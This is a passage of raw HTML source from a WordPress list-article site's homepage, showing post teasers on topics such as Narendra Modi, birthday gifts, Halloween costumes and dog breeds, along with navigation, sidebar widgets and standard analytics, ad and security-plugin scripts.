#e23a3e;}#sidebar{color: #444444;}.footer_wrapper{background-color: #333333}.footer_wrapper p,.footer_wrapper,.footer_wrapper .widget{color: #d8d8d8;}.footer_wrapper a{color: #e23a3e;}.footer_wrapper h1,.footer_wrapper h2,.footer_wrapper h3,.footer_wrapper h4,.footer_wrapper h5,.footer_wrapper h6,.footer_wrapper .widget-title{color: #ffffff;}.site-title a{text-transform: uppercase;}.nav-menu li a{text-transform: uppercase;}.footer_wrapper .widget-title{text-transform: uppercase;} </style> <script> if (document.location.protocol != "https:") { document.location = document.URL.replace(/^http:/i, "https:"); } </script> <script type="text/javascript" src="https://listovative.com/wp-content/cache/minify/13d07.js"></script> <link rel='https://api.w.org/' href='https://listovative.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://listovative.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://listovative.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://listovative.com/' /> <link rel="alternate" type="application/json+oembed" href="https://listovative.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Flistovative.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://listovative.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Flistovative.com%2F&#038;format=xml" /> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//listovative.com/?wordfence_lh=1&hid=D57052BF3AE5D32F4F3ED0CA48BD2DCF'); </script><link rel="shortcut icon" href="https://listovative.com/wp-content/uploads/2014/08/favicon.png" type="image/x-icon" /><meta name="google-site-verification" content="YUcv3SLuqvpiGd2GvFJvGtbwVU6uSJHJWEyE1mcWDUE" /> <meta name="google-site-verification" content="DtqQIwUoUqf2KslE4tDK6URGGZPKlLKxE3Y08i_O6Bk" /> </head> <body data-rsssl=1 class="home page-template page-template-template-home page-template-template-home-php page page-id-1262 gecko thr_content_wrapped thr_sidebar_wrapped"> <header id="header" class="header full_width clearfix"> <div class="header-main"> <div class="content_wrapper"> <div class="header-main-3"> <a class="nav-btn" id="nav-open-btn" href="#"><i class="fa fa-bars"></i></a> <div class="logo_wrapper"> <div class="site-title"> <a href="https://listovative.com/" title="Listovative" > <img src="https://listovative.com/wp-content/uploads/2014/08/logo.png" alt="Listovative" /> </a> </div> </div></div> </div> </div> <div class="header-bottom"> <div class="content_wrapper"> <div class="header-bottom-wrapper navigation_centered"> <nav id="nav" class="main_navigation"> <ul id="thr_main_navigation_menu" class="nav-menu"><li id="menu-item-6" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6"><a href="https://listovative.com/category/art-literature/">Art</a></li> <li id="menu-item-7" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7"><a href="https://listovative.com/category/bizarre/">Bizarre</a></li> <li id="menu-item-16" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16"><a href="https://listovative.com/category/travel-places/">Travel &#038; Places</a></li> <li id="menu-item-9" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9"><a href="https://listovative.com/category/facts/">Facts</a></li> <li id="menu-item-14" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14"><a href="https://listovative.com/category/people-lifestyle/">People &#038; Lifestyle</a></li> <li id="menu-item-10" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10"><a href="https://listovative.com/category/food/">Food</a></li> <li id="menu-item-15" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15"><a href="https://listovative.com/category/sports-entertainment/">Sports &#038; Entertainment</a></li> <li id="menu-item-11" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11"><a href="https://listovative.com/category/history/">History</a></li> <li id="menu-item-12" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-12"><a href="https://listovative.com/category/internet-technology/">Technology</a></li> <li id="menu-item-13" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-13"><a href="https://listovative.com/category/miscellaneous/">Misc</a></li> <li id="search_header_wrap"><a id="search_header" class="search_header" href="javascript:void(0)"><i class="fa fa-search"></i></a><form class="search_header_form" action="https://listovative.com/" method="get"> <input name="s" class="search_input" size="20" type="text" value="Type here to search..." onfocus="(this.value == 'Type here to search...') && (this.value = '')" onblur="(this.value == '') && (this.value = 'Type here to search...')" placeholder="Type here to search..." /> </form></li></ul></nav> </div> </div> </div> </header> <main id="main_content" class="clearfix"> <section id="thr_main" class="content_wrapper"> <div class="main_content_wrapper"> <div class="posts_wrapper layout_b"> <article id="post-5012" class="post-5012 post type-post status-publish format-standard has-post-thumbnail hentry category-education category-facts category-people-lifestyle tag-gujurat tag-india tag-life-facts tag-narendra-modi tag-prime-minister"> <div class="entry-image featured_image"> <a href="https://listovative.com/top-10-narendra-modi-life-facts-get-modified/" title=""> <img width="267" height="267" src="https://listovative.com/wp-content/uploads/2014/11/m4-267x267.jpg" class="attachment-thr-layout-b size-thr-layout-b wp-post-image" alt="" srcset="https://listovative.com/wp-content/uploads/2014/11/m4-267x267.jpg 267w, https://listovative.com/wp-content/uploads/2014/11/m4-150x150.jpg 150w, https://listovative.com/wp-content/uploads/2014/11/m4-100x100.jpg 100w" sizes="(max-width: 267px) 100vw, 267px" /> <span class="featured_item_overlay"></span> </a> </div> <h2 class="entry-title"><a href="https://listovative.com/top-10-narendra-modi-life-facts-get-modified/" title="">Top 10 Narendra Modi Life Facts &#8211; Get &#8216;Modi&#8217;fied</a></h2> <div class="entry-meta"> <div class="meta-item date"><i class="icon-clock"></i><span>2 weeks ago</span></div><div class="meta-item author"><i class="icon-user"></i><a href="https://listovative.com/author/kavya-vidyarthi/">kavya.vidyarthi</a></div><div class="meta-item categories"><i class="icon-note"></i><a href="https://listovative.com/category/education/" rel="category tag">Education</a>, <a href="https://listovative.com/category/facts/" rel="category tag">Facts</a>, <a href="https://listovative.com/category/people-lifestyle/" rel="category tag">People &amp; Lifestyle</a></div> </div> <div class="entry-content"> <p>You know who’s the prime minister of the second most populous country in the world? Of course you do, it’s the man who has changed the Politics of the country and Modi-fied one and all, Mr Narendra Modi. Vouching for myself, I was no great NaMo supporter but nevertheless, I found the Modi wave...</p> <div class="meta-item"> <a href="https://listovative.com/top-10-narendra-modi-life-facts-get-modified/" class="read_more_button"><i class="icon-arrow-right"></i>Read More</a> </div> </div> <div class="clear"></div> </article> <article id="post-19767" class="post-19767 post type-post status-publish format-standard has-post-thumbnail hentry category-education category-facts"> <div class="entry-image featured_image"> <a href="https://listovative.com/best-seo-toronto-companies/" title=""> <img width="267" height="267" src="https://listovative.com/wp-content/uploads/2019/04/bigstock-Successful-Seo-Manager-With-Cu-256467871-267x267.jpg" class="attachment-thr-layout-b size-thr-layout-b wp-post-image" alt="" srcset="https://listovative.com/wp-content/uploads/2019/04/bigstock-Successful-Seo-Manager-With-Cu-256467871-267x267.jpg 267w, https://listovative.com/wp-content/uploads/2019/04/bigstock-Successful-Seo-Manager-With-Cu-256467871-150x150.jpg 150w, https://listovative.com/wp-content/uploads/2019/04/bigstock-Successful-Seo-Manager-With-Cu-256467871-100x100.jpg 100w" sizes="(max-width: 267px) 100vw, 267px" /> <span class="featured_item_overlay"></span> </a> </div> <h2 class="entry-title"><a href="https://listovative.com/best-seo-toronto-companies/" title="">Top 10 Best SEO Companies in Toronto</a></h2> <div class="entry-meta"> <div class="meta-item date"><i class="icon-clock"></i><span>3 weeks ago</span></div><div class="meta-item author"><i class="icon-user"></i><a href="https://listovative.com/author/deeptimehra/">Deepti Mehra</a></div><div class="meta-item categories"><i class="icon-note"></i><a href="https://listovative.com/category/education/" rel="category tag">Education</a>, <a href="https://listovative.com/category/facts/" rel="category tag">Facts</a></div> </div> <div class="entry-content"> <p>In this competitive era, websites cannot sustain for long without Search Engine Optimization(SEO). If you know how important SEO is to survive on the internet in this contemporary period, then you will also be knowing that it is only the work of highly experienced professionals and companies...</p> <div class="meta-item"> <a href="https://listovative.com/best-seo-toronto-companies/" class="read_more_button"><i class="icon-arrow-right"></i>Read More</a> </div> </div> <div class="clear"></div> </article> <article id="post-1453" class="post-1453 post type-post status-publish format-standard has-post-thumbnail hentry category-miscellaneous category-people-lifestyle tag-awesome tag-beautiful tag-birthday tag-gifts tag-sister tag-useful"> <div class="entry-image featured_image"> <a href="https://listovative.com/top-10-awesome-beautiful-gifts-to-give-sister-on-her-birthday/" title=""> <img width="267" height="267" src="https://listovative.com/wp-content/uploads/2014/08/savings-267x267.jpg" class="attachment-thr-layout-b size-thr-layout-b wp-post-image" alt="" srcset="https://listovative.com/wp-content/uploads/2014/08/savings-267x267.jpg 267w, https://listovative.com/wp-content/uploads/2014/08/savings-150x150.jpg 150w, https://listovative.com/wp-content/uploads/2014/08/savings-100x100.jpg 100w" sizes="(max-width: 267px) 100vw, 267px" /> <span class="featured_item_overlay"></span> </a> </div> <h2 class="entry-title"><a href="https://listovative.com/top-10-awesome-beautiful-gifts-to-give-sister-on-her-birthday/" title="">Top 10 Awesome Gifts to give your Sister on her Birthday</a></h2> <div class="entry-meta"> <div class="meta-item date"><i class="icon-clock"></i><span>4 weeks ago</span></div><div class="meta-item author"><i class="icon-user"></i><a href="https://listovative.com/author/poulomi/">Poulomi Bhadra</a></div><div class="meta-item categories"><i class="icon-note"></i><a href="https://listovative.com/category/miscellaneous/" rel="category tag">Miscellaneous</a>, <a href="https://listovative.com/category/people-lifestyle/" rel="category tag">People &amp; Lifestyle</a></div> </div> <div class="entry-content"> <p>There are many women in our life who are special to us. But the one that has known you for all our and  her life bears special mention. She has watched you grow into the person you are, has been party to all your mischief, has kept all your secrets from mum, has been as excited as you over your...</p> <div class="meta-item"> <a href="https://listovative.com/top-10-awesome-beautiful-gifts-to-give-sister-on-her-birthday/" class="read_more_button"><i class="icon-arrow-right"></i>Read More</a> </div> </div> <div class="clear"></div> </article> <article id="post-1895" class="post-1895 post type-post status-publish format-standard has-post-thumbnail hentry category-miscellaneous category-people-lifestyle tag-deal tag-difficult tag-how-to tag-people tag-simple tag-tips"> <div class="entry-image featured_image"> <a href="https://listovative.com/10-simple-tips-to-deal-with-difficult-people/" title=""> <img width="267" height="267" src="https://listovative.com/wp-content/uploads/2014/08/25-267x267.jpg" class="attachment-thr-layout-b size-thr-layout-b wp-post-image" alt="" srcset="https://listovative.com/wp-content/uploads/2014/08/25-267x267.jpg 267w, https://listovative.com/wp-content/uploads/2014/08/25-150x150.jpg 150w, https://listovative.com/wp-content/uploads/2014/08/25-100x100.jpg 100w" sizes="(max-width: 267px) 100vw, 267px" /> <span class="featured_item_overlay"></span> </a> </div> <h2 class="entry-title"><a href="https://listovative.com/10-simple-tips-to-deal-with-difficult-people/" title="">10 Simple Tips to Deal with Difficult People</a></h2> <div class="entry-meta"> <div class="meta-item date"><i class="icon-clock"></i><span>4 weeks ago</span></div><div class="meta-item author"><i class="icon-user"></i><a href="https://listovative.com/author/ankit/">Ankit Rahate</a></div><div class="meta-item categories"><i class="icon-note"></i><a href="https://listovative.com/category/miscellaneous/" rel="category tag">Miscellaneous</a>, <a href="https://listovative.com/category/people-lifestyle/" rel="category tag">People &amp; Lifestyle</a></div> </div> <div class="entry-content"> <p>In our lives, at some point or the other, be it at work, in the family or the neighborhood, we come across a certain species of creatures. They look a lot like us humans, but their actions, attitude and behavior makes us doubt it every time we look at them. This species of creatures have only one...</p> <div class="meta-item"> <a href="https://listovative.com/10-simple-tips-to-deal-with-difficult-people/" class="read_more_button"><i class="icon-arrow-right"></i>Read More</a> </div> </div> <div class="clear"></div> </article> <article id="post-2111" class="post-2111 post type-post status-publish format-standard has-post-thumbnail hentry category-miscellaneous category-people-lifestyle tag-costumess tag-diy tag-easy tag-halloween tag-scary tag-simple"> <div class="entry-image featured_image"> <a href="https://listovative.com/top-10-easy-scary-diy-halloween-costumes/" title=""> <img width="267" height="267" src="https://listovative.com/wp-content/uploads/2014/08/halloween1-267x267.jpg" class="attachment-thr-layout-b size-thr-layout-b wp-post-image" alt="" srcset="https://listovative.com/wp-content/uploads/2014/08/halloween1-267x267.jpg 267w, https://listovative.com/wp-content/uploads/2014/08/halloween1-150x150.jpg 150w, https://listovative.com/wp-content/uploads/2014/08/halloween1-100x100.jpg 100w" sizes="(max-width: 267px) 100vw, 267px" /> <span class="featured_item_overlay"></span> </a> </div> <h2 class="entry-title"><a href="https://listovative.com/top-10-easy-scary-diy-halloween-costumes/" title="">Top 10 Easy Scary DIY Halloween Costumes</a></h2> <div class="entry-meta"> <div class="meta-item date"><i class="icon-clock"></i><span>1 month ago</span></div><div class="meta-item author"><i class="icon-user"></i><a href="https://listovative.com/author/gautami/">gautami singh</a></div><div class="meta-item categories"><i class="icon-note"></i><a href="https://listovative.com/category/miscellaneous/" rel="category tag">Miscellaneous</a>, <a href="https://listovative.com/category/people-lifestyle/" rel="category tag">People &amp; Lifestyle</a></div> </div> <div class="entry-content"> <p>Halloween also known as All Hallow&#8217;s Eve or All Saint&#8217;s Eve is celebrated on 31st October to remember the dead, including saints, martyrs and all the faithful departed souls.This day marks the end of harvest season and beginning of the winter season. It is believed that this...</p> <div class="meta-item"> <a href="https://listovative.com/top-10-easy-scary-diy-halloween-costumes/" class="read_more_button"><i class="icon-arrow-right"></i>Read More</a> </div> </div> <div class="clear"></div> </article> <article id="post-7182" class="post-7182 post type-post status-publish format-standard has-post-thumbnail hentry category-education category-facts category-people-lifestyle"> <div class="entry-image featured_image"> <a href="https://listovative.com/top-10-natural-home-remedies-for-cut-on-tongue/" title=""> <img width="259" height="194" src="https://listovative.com/wp-content/uploads/2016/02/cut-on-tongue.jpg" class="attachment-thr-layout-b size-thr-layout-b wp-post-image" alt="" /> <span class="featured_item_overlay"></span> </a> </div> <h2 class="entry-title"><a href="https://listovative.com/top-10-natural-home-remedies-for-cut-on-tongue/" title="">Top 10 Natural, Home Remedies for Cut on Tongue</a></h2> <div class="entry-meta"> <div class="meta-item date"><i class="icon-clock"></i><span>2 months ago</span></div><div class="meta-item author"><i class="icon-user"></i><a href="https://listovative.com/author/nishthasaxena/">Nishtha Saxena</a></div><div class="meta-item categories"><i class="icon-note"></i><a href="https://listovative.com/category/education/" rel="category tag">Education</a>, <a href="https://listovative.com/category/facts/" rel="category tag">Facts</a>, <a href="https://listovative.com/category/people-lifestyle/" rel="category tag">People &amp; Lifestyle</a></div> </div> <div class="entry-content"> <p>Tongue Cuts are a common condition, and often heal on their own without any treatment. They have many causes; including accidentally biting on the tongue, tongue ulcers or eating foods that have sharp edges that may injure the tongue. If it’s simply a graze, it often goes away swiftly and...</p> <div class="meta-item"> <a href="https://listovative.com/top-10-natural-home-remedies-for-cut-on-tongue/" class="read_more_button"><i class="icon-arrow-right"></i>Read More</a> </div> </div> <div class="clear"></div> </article> <article id="post-7098" class="post-7098 post type-post status-publish format-standard has-post-thumbnail hentry category-people-lifestyle"> <div class="entry-image featured_image"> <a href="https://listovative.com/30-best-unique-birthday-gift-ideas-for-boyfriend/" title=""> <img width="267" height="168" src="https://listovative.com/wp-content/uploads/2016/02/download-4-1-267x168.jpe" class="attachment-thr-layout-b size-thr-layout-b wp-post-image" alt="" /> <span class="featured_item_overlay"></span> </a> </div> <h2 class="entry-title"><a href="https://listovative.com/30-best-unique-birthday-gift-ideas-for-boyfriend/" title="">30 Best Unique Birthday Gift Ideas for Boyfriend</a></h2> <div class="entry-meta"> <div class="meta-item date"><i class="icon-clock"></i><span>2 months ago</span></div><div class="meta-item author"><i class="icon-user"></i><a href="https://listovative.com/author/samridhisharma/">Samridhi Sharma</a></div><div class="meta-item categories"><i class="icon-note"></i><a href="https://listovative.com/category/people-lifestyle/" rel="category tag">People &amp; Lifestyle</a></div> </div> <div class="entry-content"> <p>Is it that month already? There&#8217;s never enough time to plan out your sweetheart&#8217;s birthday. I agree when you say that your boyfriend is the best and he deserves each and everything in his life. Of course he does! A special man must be made to feel special on his birthday. After all, a...</p> <div class="meta-item"> <a href="https://listovative.com/30-best-unique-birthday-gift-ideas-for-boyfriend/" class="read_more_button"><i class="icon-arrow-right"></i>Read More</a> </div> </div> <div class="clear"></div> </article> <article id="post-7252" class="post-7252 post type-post status-publish format-standard has-post-thumbnail hentry category-education category-facts category-miscellaneous category-people-lifestyle tag-baby-names"> <div class="entry-image featured_image"> <a href="https://listovative.com/150-best-unique-baby-boy-names-with-meaning/" title=""> <img width="267" height="267" src="https://listovative.com/wp-content/uploads/2016/02/baby-boy-names-267x267.png" class="attachment-thr-layout-b size-thr-layout-b wp-post-image" alt="" srcset="https://listovative.com/wp-content/uploads/2016/02/baby-boy-names-267x267.png 267w, https://listovative.com/wp-content/uploads/2016/02/baby-boy-names-150x150.png 150w, https://listovative.com/wp-content/uploads/2016/02/baby-boy-names-100x100.png 100w, https://listovative.com/wp-content/uploads/2016/02/baby-boy-names.png 300w" sizes="(max-width: 267px) 100vw, 267px" /> <span class="featured_item_overlay"></span> </a> </div> <h2 class="entry-title"><a href="https://listovative.com/150-best-unique-baby-boy-names-with-meaning/" title="">150 Best Unique Baby Boy Names with Meaning</a></h2> <div class="entry-meta"> <div class="meta-item date"><i class="icon-clock"></i><span>2 months ago</span></div><div class="meta-item author"><i class="icon-user"></i><a href="https://listovative.com/author/nishthasaxena/">Nishtha Saxena</a></div><div class="meta-item categories"><i class="icon-note"></i><a href="https://listovative.com/category/education/" rel="category tag">Education</a>, <a href="https://listovative.com/category/facts/" rel="category tag">Facts</a>, <a href="https://listovative.com/category/miscellaneous/" rel="category tag">Miscellaneous</a>, <a href="https://listovative.com/category/people-lifestyle/" rel="category tag">People &amp; Lifestyle</a></div> </div> <div class="entry-content"> <p>Congratulations, you&#8217;re having a boy! Celebrations and blessings are now going to be showered upon you, as well as a slew of responsibilities. However, the first responsibility that you have to your child, is naming him. A name holds the power to shape your child&#8217;s personality. His...</p> <div class="meta-item"> <a href="https://listovative.com/150-best-unique-baby-boy-names-with-meaning/" class="read_more_button"><i class="icon-arrow-right"></i>Read More</a> </div> </div> <div class="clear"></div> </article> <article id="post-6906" class="post-6906 post type-post status-publish format-standard has-post-thumbnail hentry category-education category-facts tag-breeds tag-dogs tag-largest"> <div class="entry-image featured_image"> <a href="https://listovative.com/30-of-the-largest-dog-breeds/" title=""> <img width="267" height="267" src="https://listovative.com/wp-content/uploads/2016/02/english-mastiff-267x267.jpg" class="attachment-thr-layout-b size-thr-layout-b wp-post-image" alt="English-Mastiff" srcset="https://listovative.com/wp-content/uploads/2016/02/english-mastiff-267x267.jpg 267w, https://listovative.com/wp-content/uploads/2016/02/english-mastiff-150x150.jpg 150w, https://listovative.com/wp-content/uploads/2016/02/english-mastiff-100x100.jpg 100w" sizes="(max-width: 267px) 100vw, 267px" /> <span class="featured_item_overlay"></span> </a> </div> <h2 class="entry-title"><a href="https://listovative.com/30-of-the-largest-dog-breeds/" title="">30 Of the Largest Dog Breeds</a></h2> <div class="entry-meta"> <div class="meta-item date"><i class="icon-clock"></i><span>2 months ago</span></div><div class="meta-item author"><i class="icon-user"></i><a href="https://listovative.com/author/nishthasaxena/">Nishtha Saxena</a></div><div class="meta-item categories"><i class="icon-note"></i><a href="https://listovative.com/category/education/" rel="category tag">Education</a>, <a href="https://listovative.com/category/facts/" rel="category tag">Facts</a></div> </div> <div class="entry-content"> <p>Through the pages of history, dogs with a bigger size were seen to possess more strength, and thus had greater utility; which is why there are so many large sized dog breeds that are indigenous to many countries of the world. While there is no universal measure for what classifies as a...</p> <div class="meta-item"> <a href="https://listovative.com/30-of-the-largest-dog-breeds/" class="read_more_button"><i class="icon-arrow-right"></i>Read More</a> </div> </div> <div class="clear"></div> </article> <article id="post-7288" class="post-7288 post type-post status-publish format-standard has-post-thumbnail hentry category-people-lifestyle tag-benefits tag-health tag-reasons tag-walking"> <div class="entry-image featured_image"> <a href="https://listovative.com/top-20-reasons-why-morning-walks-are-important/" title=""> <img width="267" height="267" src="https://listovative.com/wp-content/uploads/2016/02/mw1-267x267.jpg" class="attachment-thr-layout-b size-thr-layout-b wp-post-image" alt="" srcset="https://listovative.com/wp-content/uploads/2016/02/mw1-267x267.jpg 267w, https://listovative.com/wp-content/uploads/2016/02/mw1-150x150.jpg 150w, https://listovative.com/wp-content/uploads/2016/02/mw1-100x100.jpg 100w" sizes="(max-width: 267px) 100vw, 267px" /> <span class="featured_item_overlay"></span> </a> </div> <h2 class="entry-title"><a href="https://listovative.com/top-20-reasons-why-morning-walks-are-important/" title="">Top 20 Reasons why Morning Walks are Important</a></h2> <div class="entry-meta"> <div class="meta-item date"><i class="icon-clock"></i><span>3 months ago</span></div><div class="meta-item author"><i class="icon-user"></i><a href="https://listovative.com/author/bhavyasinha/">Bhavya Sinha</a></div><div class="meta-item categories"><i class="icon-note"></i><a href="https://listovative.com/category/people-lifestyle/" rel="category tag">People &amp; Lifestyle</a></div> </div> <div class="entry-content"> <p>“When I&#8217;m in turmoil, when I can&#8217;t think, when I&#8217;m exhausted and afraid and feeling very, very alone, I go for walks. It&#8217;s just one of those things I do. I walk and I walk and sooner or later something comes to me, something to make me feel less like jumping off a...</p> <div class="meta-item"> <a href="https://listovative.com/top-20-reasons-why-morning-walks-are-important/" class="read_more_button"><i class="icon-arrow-right"></i>Read More</a> </div> </div> <div class="clear"></div> </article> </div> <div class="clear"></div> <nav id="pagination" class="pagination-wapper"> <div id="thr_pagination"><span aria-current='page' class='page-numbers current'>1</span> <a class='page-numbers' href='https://listovative.com/page/2/'>2</a> <a class='page-numbers' href='https://listovative.com/page/3/'>3</a> <span class="page-numbers dots">&hellip;</span> <a class='page-numbers' href='https://listovative.com/page/70/'>70</a> <a class="next page-numbers" href="https://listovative.com/page/2/">Next</a></div> </nav> </div> <aside id="sidebar" class="sidebar right"> <div id="search-5" class="widget widget_search"><form class="search_form" action="https://listovative.com/" method="get"> <input name="s" class="search_input" size="20" type="text" value="Type here to search..." onfocus="(this.value == 'Type here to search...') && (this.value = '')" onblur="(this.value == '') && (this.value = 'Type here to search...')" placeholder="Type here to search..." /> <i class="icon-magnifier"></i> </form></div><div id="categories-2" class="widget widget_categories"><h4 class="widget-title"><span>Categories</span></h4> <ul> <li class="cat-item cat-item-3"><a href="https://listovative.com/category/art-literature/" >Art &amp; Literature</a> </li> <li class="cat-item cat-item-4"><a href="https://listovative.com/category/bizarre/" >Bizarre</a> </li> <li class="cat-item cat-item-12"><a href="https://listovative.com/category/education/" >Education</a> </li> <li class="cat-item cat-item-11"><a href="https://listovative.com/category/facts/" >Facts</a> </li> <li class="cat-item cat-item-10"><a href="https://listovative.com/category/food/" >Food</a> </li> <li class="cat-item cat-item-8"><a href="https://listovative.com/category/history/" >History</a> </li> <li class="cat-item cat-item-7"><a href="https://listovative.com/category/internet-technology/" >Internet &amp; Technology</a> </li> <li class="cat-item cat-item-13"><a href="https://listovative.com/category/miscellaneous/" >Miscellaneous</a> </li> <li class="cat-item cat-item-6"><a href="https://listovative.com/category/people-lifestyle/" >People &amp; Lifestyle</a> </li> <li class="cat-item cat-item-9"><a href="https://listovative.com/category/sports-entertainment/" >Sports &amp; Entertainment</a> </li> <li class="cat-item cat-item-5"><a href="https://listovative.com/category/travel-places/" >Travel &amp; Places</a> </li> <li class="cat-item cat-item-1"><a href="https://listovative.com/category/uncategorized/" >Uncategorized</a> </li> </ul> </div> <div id="recent-posts-2" class="widget widget_recent_entries"> <h4 class="widget-title"><span>Recent Posts</span></h4> <ul> <li> <a href="https://listovative.com/top-10-narendra-modi-life-facts-get-modified/">Top 10 Narendra Modi Life Facts &#8211; Get &#8216;Modi&#8217;fied</a> </li> <li> <a href="https://listovative.com/best-seo-toronto-companies/">Top 10 Best SEO Companies in Toronto</a> </li> <li> <a href="https://listovative.com/top-10-awesome-beautiful-gifts-to-give-sister-on-her-birthday/">Top 10 Awesome Gifts to give your Sister on her Birthday</a> </li> <li> <a href="https://listovative.com/10-simple-tips-to-deal-with-difficult-people/">10 Simple Tips to Deal with Difficult People</a> </li> <li> <a href="https://listovative.com/top-10-easy-scary-diy-halloween-costumes/">Top 10 Easy Scary DIY Halloween Costumes</a> </li> </ul> </div><div id="text-5" class="widget widget_text"> <div class="textwidget">Find more list articles: <a href="https://listbrew.com/" target="_blank">Top Lists</a> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- listovative-home-page --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-7010907802093542" data-ad-slot="3553656894"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </div><div class="thr_sticky"><div id="text-3" class="widget widget_text"> <div class="textwidget"><!-- Place this tag in your head or just before your close body tag. --> <script src="https://apis.google.com/js/platform.js" async defer></script> <!-- Place this tag where you want the widget to render. --> <div class="g-page" data-href="//plus.google.com/u/0/112214800556939229952" data-layout="landscape" data-rel="publisher"></div></div> </div><div id="text-4" class="widget widget_text"> <div class="textwidget"><iframe src="//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2Fpages%2FListovative%2F691142240979147&amp;width&amp;height=290&amp;colorscheme=light&amp;show_faces=true&amp;header=true&amp;stream=false&amp;show_border=true&amp;appId=214299575287225" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:290px;" allowTransparency="true"></iframe></div> </div></div></aside> </section> </main> <div class="clear"></div> <footer id="footer" class="footer_wrapper full_width"> <div class="content_wrapper"> <div id="search-4" class="widget footer-col one-third widget_search"><form class="search_form" action="https://listovative.com/" method="get"> <input name="s" class="search_input" size="20" type="text" value="Type here to search..." onfocus="(this.value == 'Type here to search...') && (this.value = '')" onblur="(this.value == '') && (this.value = 'Type here to search...')" placeholder="Type here to search..." /> <i class="icon-magnifier"></i> </form></div><div id="pages-3" class="widget footer-col one-third widget_pages"><h4 class="widget-title"><span>Pages</span></h4> <ul> <li class="page_item page-item-417"><a href="https://listovative.com/advertise-us/">Advertise with Us</a></li> <li class="page_item page-item-415"><a href="https://listovative.com/contact-us/">Contact Us</a></li> <li class="page_item page-item-1262 current_page_item"><a href="https://listovative.com/">Home</a></li> <li class="page_item page-item-1844"><a href="https://listovative.com/privacy-policy/">Privacy Policy</a></li> </ul> </div><div id="calendar-2" class="widget footer-col one-third widget_calendar"><div id="calendar_wrap" class="calendar_wrap"><table id="wp-calendar"> <caption>May 2019</caption> <thead> <tr> <th scope="col" title="Monday">M</th> <th scope="col" title="Tuesday">T</th> <th scope="col" title="Wednesday">W</th> <th scope="col" title="Thursday">T</th> <th scope="col" title="Friday">F</th> <th scope="col" title="Saturday">S</th> <th scope="col" title="Sunday">S</th> </tr> </thead> <tfoot> <tr> <td colspan="3" id="prev"><a href="https://listovative.com/2019/04/">&laquo; Apr</a></td> <td class="pad">&nbsp;</td> <td colspan="3" id="next" class="pad">&nbsp;</td> </tr> </tfoot> <tbody> <tr> <td colspan="2" class="pad">&nbsp;</td><td>1</td><td>2</td><td>3</td><td>4</td><td>5</td> </tr> <tr> <td>6</td><td>7</td><td>8</td><td>9</td><td>10</td><td>11</td><td>12</td> </tr> <tr> <td>13</td><td>14</td><td>15</td><td id="today">16</td><td>17</td><td>18</td><td>19</td> </tr> <tr> <td>20</td><td>21</td><td>22</td><td>23</td><td>24</td><td>25</td><td>26</td> </tr> <tr> <td>27</td><td>28</td><td>29</td><td>30</td><td>31</td> <td class="pad" colspan="2">&nbsp;</td> </tr> </tbody> </table></div></div> </div> <div id="copy_area" class="copy_area full_width"> <div class="content_wrapper"> <div class="left"> 2017 © Listovative.com. All Rights Reserved. </div> <ul id="thr_footer_menu" class="shl-footer-menu"><li id="menu-item-1259" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-1259"><a href="https://listovative.com">Home</a></li> <li id="menu-item-419" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-419"><a href="https://listovative.com/advertise-us/">Advertise with Us</a></li> <li id="menu-item-1850" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1850"><a href="https://listovative.com/privacy-policy/">Privacy Policy</a></li> <li id="menu-item-420" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-420"><a href="https://listovative.com/contact-us/">Contact Us</a></li> </ul> </div> </div> </footer> <a href="javascript:void(0)" id="back-top"><i class="fa fa-angle-up"></i></a> <!-- WP Socializer 3.2 - JS - Start --> <!-- WP Socializer - JS - End --> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/listovative.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"cached":"1"}; /* ]]> */ </script> <script type="text/javascript" src="https://listovative.com/wp-content/cache/minify/0fef6.js"></script> <script type='text/javascript'> /* <![CDATA[ */ var qpprFrontData = 